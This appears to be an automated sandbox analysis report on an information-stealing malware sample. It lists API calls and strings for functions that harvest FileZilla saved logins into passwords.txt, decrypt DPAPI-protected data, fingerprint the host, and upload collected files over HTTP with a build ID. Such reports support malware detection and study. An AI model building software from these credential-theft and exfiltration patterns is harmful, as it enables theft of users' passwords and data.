Opcode Fuzzy Hash: ecd3519e3741eaa470c35dcf05407402c1190084f799967f94555945819a9a86
Instruction Fuzzy Hash: 38012170A002289FDB60DF649D49BDE77B8AF09311F5401E6E409E22A0DB788F818F64

Function 00410DB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

GetKeyboardLayoutList.USER32(00000000,00000000,0043670A,?,?), ref: 00410DE1
LocalAlloc.KERNEL32(00000040,00000000), ref: 00410DEF
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410DFD
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E2C

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

LocalFree.KERNEL32(00000000), ref: 00410ED4

Strings

/ , xrefs: 00410E48

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: 2724f273fec84ff33f4e939fb377e0207cae21665a8476e921378471c4432e86
Instruction ID: 729bc086ff3401d41ff5aa38ae66934e308629714cd674665d7268366cdd9aa4
Opcode Fuzzy Hash: 2724f273fec84ff33f4e939fb377e0207cae21665a8476e921378471c4432e86
Instruction Fuzzy Hash: 8531FA71900328ABDB20EB65DD89ADEB3B8BB04305F1045EAF519B7152CBB85EC58F54

Function 00412554 Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041255E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417FBD,.exe,00436CD4,00436CD0,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC), ref: 0041257D
Process32First.KERNEL32(00000000,00000128), ref: 0041258D
Process32Next.KERNEL32(00000000,00000128), ref: 0041259F
StrCmpCA.SHLWAPI(?), ref: 004125B1
CloseHandle.KERNEL32(00000000), ref: 004125C5

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID:
API String ID: 1799959500-0
Opcode ID: 47027d98fb1146cbc6c0e1b8c8d69d15098c7f4b092a7b7c05abaeaea0848dfe
Instruction ID: 385640d0b7579d5eaa17a02d2fab76b0057a6950b15d779b4a4689f4b8bf2c84
Opcode Fuzzy Hash: 47027d98fb1146cbc6c0e1b8c8d69d15098c7f4b092a7b7c05abaeaea0848dfe
Instruction Fuzzy Hash: 7D018671500224ABEB24DB609D48FEE7BBD9F05701F4400EAE409D6251D7788B849B25

Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB6A,?,?,?,?,?,?,?,0040CC65,?,?), ref: 004080D8
LocalFree.KERNEL32(0040CB6A,?,?,0040823B,0040CB6A,?,?,?,?,?,?,?,0040CC65,?,?), ref: 004080FD

Strings

DPAPI, xrefs: 004080A9

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID: DPAPI
API String ID: 2068576380-1690256801
Opcode ID: 71843aaf0a7933e65d977fae079d0a2f5d5a43d1982792f3285d4ffad2c25dc6
Instruction ID: 5332633284173789c767692548fdca268c5249f85a7424e749217d90e47653fb
Opcode Fuzzy Hash: 71843aaf0a7933e65d977fae079d0a2f5d5a43d1982792f3285d4ffad2c25dc6
Instruction Fuzzy Hash: AC01EC75A01218EFCB04DFA8D88489EBBB9FF48714F158466E906E7341D7719F05CB90

Function 0041147A Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0043670F,?,?), ref: 004114A9
Process32First.KERNEL32(00000000,00000128), ref: 004114B9
Process32Next.KERNEL32(00000000,00000128), ref: 00411517
CloseHandle.KERNEL32(00000000), ref: 00411522

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 907984538-0
Opcode ID: b478cc063295a184bf11bc7f7bb1583928a6648d7bb05075e6248a051df8931c
Instruction ID: 48cd5fe09e8a88dc895cce4f985412a916ca55bcda0d84d79aa5faaea2e91a5a
Opcode Fuzzy Hash: b478cc063295a184bf11bc7f7bb1583928a6648d7bb05075e6248a051df8931c
Instruction Fuzzy Hash: 1511A371A00218A7DB11FB219C85AEE73A9AF44704F00109AF90AB7291CB7C9FC58F58

Function 00410D03 Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D1E
HeapAlloc.KERNEL32(00000000), ref: 00410D25
GetTimeZoneInformation.KERNEL32(?), ref: 00410D34
wsprintfA.USER32 ref: 00410D52

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 777d8121b5b1ce313eb417fe3bc5c67830109766bc73d65ea7eb4edc341b23c2
Instruction ID: 064e980fbceb68efa2cc8567f906739db49e296eb84e1a71cc9b51000a306715
Opcode Fuzzy Hash: 777d8121b5b1ce313eb417fe3bc5c67830109766bc73d65ea7eb4edc341b23c2
Instruction Fuzzy Hash: 70F0E971A00324ABEB04DBB4EC49BAB37B9AB04725F100295F515D72D0DB749F858B95

Function 00410C28 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C34
RtlAllocateHeap.NTDLL(00000000,?,?,?,004013B9), ref: 00410C3B
GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C4F

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34

Function 00410F8F Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00410FA9
wsprintfA.USER32 ref: 00410FC1

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: a4999cb9ea1add73611b93d619ce9293718cdf998774c061791918c6f6fc24da
Instruction ID: d25fd13e54b046c54e2bfcee0452c516ab2eef1b8e83a7e196185c263e22a4d5
Opcode Fuzzy Hash: a4999cb9ea1add73611b93d619ce9293718cdf998774c061791918c6f6fc24da
Instruction Fuzzy Hash: 02E092B0D1020DABCF10DFA0EC45ADD77FCAB08308F0055B5A505D3180DA74ABC98F88

Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,004186D0), ref: 004014DF

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

lstrlenA.KERNEL32(?), ref: 00405519

Part of subcall function 00411E32: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E708,?,?,?,004128E1,?,?,00000000), ref: 00411E52
Part of subcall function 00411E32: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128E1,?,?,00000000), ref: 00411E5F
Part of subcall function 00411E32: HeapAlloc.KERNEL32(00000000,?,?,?,004128E1,?,?,00000000), ref: 00411E66

StrCmpCA.SHLWAPI(?,00436976,0043695B,00436957,0043694B), ref: 00405588
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

lstrlenA.KERNEL32(?,",file_data,00437848,------,0043783C,?,",00437830,------,00437824,8ecc9c7eaebfdf2a8cc0586d7419d6ea,",build_id,0043780C,------), ref: 00405C67
lstrlenA.KERNEL32(?), ref: 00405C7A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
HeapAlloc.KERNEL32(00000000), ref: 00405C99
lstrlenA.KERNEL32(?), ref: 00405CA6
_memmove.LIBCMT ref: 00405CB4
lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
_memmove.LIBCMT ref: 00405CD6
lstrlenA.KERNEL32(?), ref: 00405CE4
lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
_memmove.LIBCMT ref: 00405D05
lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
ExitProcess.KERNEL32 ref: 00405E46

Strings

build_id, xrefs: 0040594F
------, xrefs: 0040573C
------, xrefs: 00405B5D
", xrefs: 0040597B
file_data, xrefs: 00405C09
ERROR, xrefs: 00405D79
------, xrefs: 00405605
block, xrefs: 00405E30
", xrefs: 00405C35
------, xrefs: 004059FF
--, xrefs: 00405600
8ecc9c7eaebfdf2a8cc0586d7419d6ea, xrefs: 004059A7
", xrefs: 0040581B
------, xrefs: 0040589D
ERROR, xrefs: 00405F2F
", xrefs: 00405AD8

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$8ecc9c7eaebfdf2a8cc0586d7419d6ea$ERROR$ERROR$block$build_id$file_data
API String ID: 2638065154-1532159748
Opcode ID: 35035fa0e09a60818810ebde985685f3ce7042818e415ae2c50ee2fa773c2129
Instruction ID: c08b1542f2c47ec2b082c908b68f827a8f2b1c5282b8220e63d03fbfb2eb7b8e
Opcode Fuzzy Hash: 35035fa0e09a60818810ebde985685f3ce7042818e415ae2c50ee2fa773c2129
Instruction Fuzzy Hash: 4842B6719001699BDF21FB21DC45ADDB7B9BF04348F0085E6A589B3152CEB46FC69F88

Function 0040E6A4 Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034

Part of subcall function 00411DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416973,?), ref: 00411E0C

strtok_s.MSVCRT ref: 0040E753
GetProcessHeap.KERNEL32(00000000,000F423F,004368FF,004368FE,004368EF,004368EE), ref: 0040E799
HeapAlloc.KERNEL32(00000000), ref: 0040E7A0
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7B4
lstrlenA.KERNEL32(00000000), ref: 0040E7BF
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E7F3
lstrlenA.KERNEL32(00000000), ref: 0040E7FE
StrStrA.SHLWAPI(00000000,<User>), ref: 0040E82C
lstrlenA.KERNEL32(00000000), ref: 0040E837
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E865
lstrlenA.KERNEL32(00000000), ref: 0040E870
lstrlenA.KERNEL32(?), ref: 0040E8D6
lstrlenA.KERNEL32(?), ref: 0040E8EA
lstrlenA.KERNEL32(0040EC91), ref: 0040EA12

Part of subcall function 00417023: CreateThread.KERNEL32(00000000,00000000,00416F52,?,00000000,00000000), ref: 004170C2
Part of subcall function 00417023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 004170CA

Strings

<Port>, xrefs: 0040E7ED
Password: , xrefs: 0040E983
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040E6F4
Soft: FileZilla, xrefs: 0040E91D
Host: , xrefs: 0040E929
<Host>, xrefs: 0040E7AE
<Pass encoding="base64">, xrefs: 0040E85F
passwords.txt, xrefs: 0040EA22
<User>, xrefs: 0040E826
Login: , xrefs: 0040E961

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 4146028692-935134978
Opcode ID: 867d7bfbf85c3a5c40272ecb5d6aa6545f242de8da2ce4d66f3f3e428bd4dbbd
Instruction ID: 198a37f40fddf1b7ba73535a65c339602e2087007c176f0166085d638d117e74
Opcode Fuzzy Hash: 867d7bfbf85c3a5c40272ecb5d6aa6545f242de8da2ce4d66f3f3e428bd4dbbd
Instruction Fuzzy Hash: 05A16472A00219BBCF01FBA1DD4AACD7779AF08705F105426F601F31A1DB79AF858B99

Function 00406BB5 Relevance: 63.6, APIs: 20, Strings: 16, Instructions: 598
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
StrCmpCA.SHLWAPI(?), ref: 00406C72
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
